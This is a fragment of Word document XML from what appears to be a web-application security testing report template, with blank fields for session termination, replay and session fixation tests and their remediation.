      <w:tr w:rsidR="00845495" w:rsidRPr="00845495" w14:paraId="60FE2A11" w14:textId="77777777" w:rsidTr="0037386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5AFC6A4" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495"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 Vulnerabilities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3648706" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79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29CDE59" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="79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70AEF33" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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9873C89" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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42A38C5" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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2D0D813" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="0084549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45495" w:rsidRPr="00845495" w14:paraId="64BDE1CF" w14:textId="77777777" w:rsidTr="0037386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1A0ADDD" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="003738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45495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C3AA909" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="80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173AF7C" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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E20137E" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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F98B4C0" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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05AD368" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="00845495">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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76D3CAF" w14:textId="77777777" w:rsidR="00845495" w:rsidRPr="00845495" w:rsidRDefault="00845495" w:rsidP="0084549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556A8A29" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRPr="00A51A96" w:rsidRDefault="00BF406D" w:rsidP="00BF406D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lastRenderedPageBreak/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406D" w14:paraId="1F64036F" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73432587" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="720395B0" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E9285A4" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="261D8C11" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56933773" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68C3175C" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41E2C088" w14:textId="77777777" w:rsidR="00A047A2" w:rsidRDefault="00A047A2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BF406D" w:rsidRPr="00A51A96" w14:paraId="27422CC2" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1C814BB5" w14:textId="06A59F5A" w:rsidR="00BF406D" w:rsidRPr="003C713F" w:rsidRDefault="00BF406D" w:rsidP="00725128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5.5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A66D06" w:rsidRPr="00A66D06">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Session Termination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74148A48" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRPr="0037386B" w:rsidRDefault="00BF406D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45"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid>
      <w:tr w:rsidR="00905692" w:rsidRPr="00905692" w14:paraId="0C54B68B" w14:textId="77777777" w:rsidTr="0037386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47310D3E" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="003738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05692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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD5E8E7" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="0090569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05692" w:rsidRPr="00905692" w14:paraId="58E00173" w14:textId="77777777" w:rsidTr="0037386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28EBB70F" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="003738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05692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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75DA75A4" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="0090569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05692" w:rsidRPr="00905692" w14:paraId="3EFF7915" w14:textId="77777777" w:rsidTr="0037386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24A46FC5" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="003738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05692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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5360ADFC" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="0090569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05692" w:rsidRPr="00905692" w14:paraId="0C0413CF" w14:textId="77777777" w:rsidTr="0037386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69D500FB" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="003738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05692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Session Expiration </w:t>
            </w:r>
            <w:r w:rsidRPr="00905692">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Implemented on the Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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B937BAB" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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905692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37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3FC2AD5" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692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905692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905692" w:rsidRPr="00905692" w14:paraId="2B131169" w14:textId="77777777" w:rsidTr="0037386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1378AB4B" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="003738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05692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Logout Function Exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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7500D7A" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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905692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37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521C1C1" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692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905692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905692" w:rsidRPr="00905692" w14:paraId="2D65ACE2" w14:textId="77777777" w:rsidTr="0037386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158FAC35" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="003738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05692">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Logout Function I</w:t>
            </w:r>
            <w:r w:rsidRPr="00905692">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>nvalidates the User’s Session on the Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00905692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32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3CE3689" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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905692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37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90EF1F8" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692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905692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905692" w:rsidRPr="00905692" w14:paraId="0991A3E7" w14:textId="77777777" w:rsidTr="0037386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30A62242" w14:textId="27604533" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00A70C55" w:rsidP="003738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70C55">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Idle Session Timeout Implemented?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CEDC39F" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00A70C55" w:rsidRDefault="00A70C55" w:rsidP="0090569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A70C5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[*Yes/No, Time Duration Before Auto Logout if Applicable]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5470E923" w14:textId="77777777" w:rsidR="00A70C55" w:rsidRDefault="00A70C55" w:rsidP="0090569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07D14BE" w14:textId="369E3085" w:rsidR="00A70C55" w:rsidRPr="00905692" w:rsidRDefault="00A70C55" w:rsidP="0090569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C3AE5" w:rsidRPr="00905692" w14:paraId="587E6E94" w14:textId="77777777" w:rsidTr="0037386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6507C7B0" w14:textId="791EE1D2" w:rsidR="007C3AE5" w:rsidRPr="00905692" w:rsidRDefault="00F43188" w:rsidP="003738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43188">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Session Token Invalidation Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE68B25" w14:textId="77777777" w:rsidR="007C3AE5" w:rsidRPr="00F43188" w:rsidRDefault="00F43188" w:rsidP="0090569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4318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[*Yes/No, Token Changes After Logout? Yes/No]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04464ECD" w14:textId="77777777" w:rsidR="00F43188" w:rsidRDefault="00F43188" w:rsidP="0090569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6849CC0" w14:textId="65F7CC83" w:rsidR="00F43188" w:rsidRPr="00905692" w:rsidRDefault="00F43188" w:rsidP="0090569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B4145" w:rsidRPr="00905692" w14:paraId="211F4EBF" w14:textId="77777777" w:rsidTr="0037386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27D22AF7" w14:textId="087C10DD" w:rsidR="000B4145" w:rsidRPr="00F43188" w:rsidRDefault="006D030B" w:rsidP="003738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D030B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Browser Cache &amp; Back Button Issue Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F4F28D6" w14:textId="77777777" w:rsidR="000B4145" w:rsidRDefault="006D030B" w:rsidP="0090569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6D030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Cached Pages Accessible After Logout? Yes/No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0E8851E" w14:textId="77777777" w:rsidR="006D030B" w:rsidRDefault="006D030B" w:rsidP="0090569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838670D" w14:textId="77777777" w:rsidR="006D030B" w:rsidRDefault="006D030B" w:rsidP="0090569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4C6FE87" w14:textId="7353C4A2" w:rsidR="0032056A" w:rsidRPr="00F43188" w:rsidRDefault="0032056A" w:rsidP="0090569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071C20" w:rsidRPr="00905692" w14:paraId="6BA84866" w14:textId="77777777" w:rsidTr="0037386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04B85381" w14:textId="26EFF82E" w:rsidR="00071C20" w:rsidRPr="006D030B" w:rsidRDefault="00071C20" w:rsidP="003738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71C20">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Replay Attack Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55149D22" w14:textId="77777777" w:rsidR="00071C20" w:rsidRDefault="00071C20" w:rsidP="0090569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071C2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Able to Replay Session Requests After Logout? Yes/No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65A8D68" w14:textId="77777777" w:rsidR="00071C20" w:rsidRDefault="00071C20" w:rsidP="0090569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863BF13" w14:textId="77777777" w:rsidR="00071C20" w:rsidRDefault="00071C20" w:rsidP="0090569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E682034" w14:textId="26BE3096" w:rsidR="00071C20" w:rsidRDefault="00071C20" w:rsidP="0090569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05692" w:rsidRPr="00905692" w14:paraId="59EDFB28" w14:textId="77777777" w:rsidTr="0037386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33499788" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="0037386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05692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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2947023E" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81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42DC317" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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AA21689" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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7473CB2" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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2F0319C" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="00905692">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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3AC094F" w14:textId="77777777" w:rsidR="00905692" w:rsidRPr="00905692" w:rsidRDefault="00905692" w:rsidP="0090569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051C2F50" w14:textId="77777777" w:rsidR="0032056A" w:rsidRPr="00A51A96" w:rsidRDefault="0032056A" w:rsidP="0032056A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056A" w14:paraId="0588EEAB" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254FC4F7" w14:textId="77777777" w:rsidR="0032056A" w:rsidRDefault="0032056A" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0043F45A" w14:textId="77777777" w:rsidR="0032056A" w:rsidRDefault="0032056A" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A01D226" w14:textId="77777777" w:rsidR="0032056A" w:rsidRDefault="0032056A" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42E7D126" w14:textId="77777777" w:rsidR="0032056A" w:rsidRDefault="0032056A" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="524F82C2" w14:textId="77777777" w:rsidR="0032056A" w:rsidRDefault="0032056A" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56FD0A52" w14:textId="77777777" w:rsidR="00AA53EE" w:rsidRDefault="00AA53EE" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F583227" w14:textId="77777777" w:rsidR="0032056A" w:rsidRDefault="0032056A" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D145025" w14:textId="77777777" w:rsidR="00BF406D" w:rsidRDefault="00BF406D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AA53EE" w:rsidRPr="00A51A96" w14:paraId="4AAA1468" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6F1318C4" w14:textId="411DC850" w:rsidR="00AA53EE" w:rsidRPr="003C713F" w:rsidRDefault="00AA53EE" w:rsidP="00725128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5.6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1076D3" w:rsidRPr="001076D3">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Session Fixation Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3094BF18" w14:textId="77777777" w:rsidR="00AA53EE" w:rsidRPr="00004856" w:rsidRDefault="00AA53EE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CA2680" w:rsidRPr="00CA2680" w14:paraId="6E1E880A" w14:textId="77777777" w:rsidTr="0000485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40C4824" w14:textId="77777777" w:rsidR="00CA2680" w:rsidRPr="00CA2680" w:rsidRDefault="00CA2680" w:rsidP="0000485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A2680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6386F9B" w14:textId="77777777" w:rsidR="00CA2680" w:rsidRPr="00CA2680" w:rsidRDefault="00CA2680" w:rsidP="00CA268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A2680" w:rsidRPr="00CA2680" w14:paraId="0E1A2C03" w14:textId="77777777" w:rsidTr="0000485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455D5DB" w14:textId="77777777" w:rsidR="00CA2680" w:rsidRPr="00CA2680" w:rsidRDefault="00CA2680" w:rsidP="0000485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A2680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BF9ED88" w14:textId="77777777" w:rsidR="00CA2680" w:rsidRPr="00CA2680" w:rsidRDefault="00CA2680" w:rsidP="00CA268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A2680" w:rsidRPr="00CA2680" w14:paraId="275ADBF2" w14:textId="77777777" w:rsidTr="0000485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D172C02" w14:textId="77777777" w:rsidR="00CA2680" w:rsidRPr="00CA2680" w:rsidRDefault="00CA2680" w:rsidP="0000485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A2680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D00160E" w14:textId="77777777" w:rsidR="00CA2680" w:rsidRPr="00CA2680" w:rsidRDefault="00CA2680" w:rsidP="00CA268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43597" w:rsidRPr="00CA2680" w14:paraId="228A9FB3" w14:textId="77777777" w:rsidTr="0000485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CE6502F" w14:textId="17B4F227" w:rsidR="00543597" w:rsidRPr="00CA2680" w:rsidRDefault="00543597" w:rsidP="0000485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bookmarkStart w:id="6" w:name="_Hlk189144182"/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Attack Performed?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C0E4D50" w14:textId="77777777" w:rsidR="00543597" w:rsidRDefault="00543597" w:rsidP="00CA268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C23A18E" w14:textId="77777777" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="00CA268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A9F0B8A" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="00CA268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420AE" w:rsidRPr="00CA2680" w14:paraId="0CC05752" w14:textId="77777777" w:rsidTr="0000485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B45961B" w14:textId="5E94E995" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="0000485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Approach Followed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90A6C1A" w14:textId="77777777" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="00CA268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CE4C081" w14:textId="77777777" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="00CA268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79C9301" w14:textId="77777777" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="00CA268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420AE" w:rsidRPr="00CA2680" w14:paraId="5853A077" w14:textId="77777777" w:rsidTr="0000485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09F1AB7" w14:textId="3CC68148" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="0000485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Is the Attack Successful?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7E896AEC" w14:textId="265A71B6" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="007420A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7420AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00905692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42D09E3F" w14:textId="1D44B665" w:rsidR="007420AE" w:rsidRDefault="007420AE" w:rsidP="007420A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7420AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00905692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8A7D07" w:rsidRPr="00CA2680" w14:paraId="494D71EC" w14:textId="77777777" w:rsidTr="0000485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B9B15D2" w14:textId="6F583F3C" w:rsidR="008A7D07" w:rsidRDefault="008A7D07" w:rsidP="0000485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Evidence Collected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0EFD385D" w14:textId="28451862" w:rsidR="008A7D07" w:rsidRPr="008A7D07" w:rsidRDefault="008A7D07" w:rsidP="008A7D0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Times New Roman" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A7D07">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA35F13" w14:textId="77777777" w:rsidR="008A7D07" w:rsidRDefault="008A7D07" w:rsidP="008A7D0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Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7104340B" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRPr="008A7D07" w:rsidRDefault="006A3CD2" w:rsidP="008A7D0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Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="6"/>
      <w:tr w:rsidR="007420AE" w:rsidRPr="00CA2680" w14:paraId="4FE3F424" w14:textId="77777777" w:rsidTr="0000485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3B4A9FB" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="0000485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A2680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Techniques Used to "Fix" the Session ID Value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4E9DE92" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82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B0C5F74" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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4B6CBDE" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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3B7DE9C" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420A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420AE" w:rsidRPr="00CA2680" w14:paraId="08ACFB0C" w14:textId="77777777" w:rsidTr="0000485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719F160" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="0000485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A2680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Test Results for Session Fixation Attack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94DEA15" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="83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D1A0B5B" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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B329931" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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F2BE5D0" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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21C1D87" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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BA58A07" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420A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A7D07" w:rsidRPr="00CA2680" w14:paraId="6DA614CE" w14:textId="77777777" w:rsidTr="0000485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BF4D70C" w14:textId="35FA1288" w:rsidR="008A7D07" w:rsidRPr="00CA2680" w:rsidRDefault="008A7D07" w:rsidP="0000485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Remediation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4BD85D9" w14:textId="77777777" w:rsidR="008A7D07" w:rsidRDefault="008A7D07" w:rsidP="008A7D0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9098352" w14:textId="77777777" w:rsidR="008A7D07" w:rsidRDefault="008A7D07" w:rsidP="008A7D0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ED78869" w14:textId="77777777" w:rsidR="008A7D07" w:rsidRDefault="008A7D07" w:rsidP="008A7D0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75C29C4" w14:textId="77777777" w:rsidR="00004856" w:rsidRDefault="00004856" w:rsidP="008A7D0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D500F1D" w14:textId="77777777" w:rsidR="00004856" w:rsidRDefault="00004856" w:rsidP="008A7D0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AEAD2CF" w14:textId="77777777" w:rsidR="008A7D07" w:rsidRPr="00CA2680" 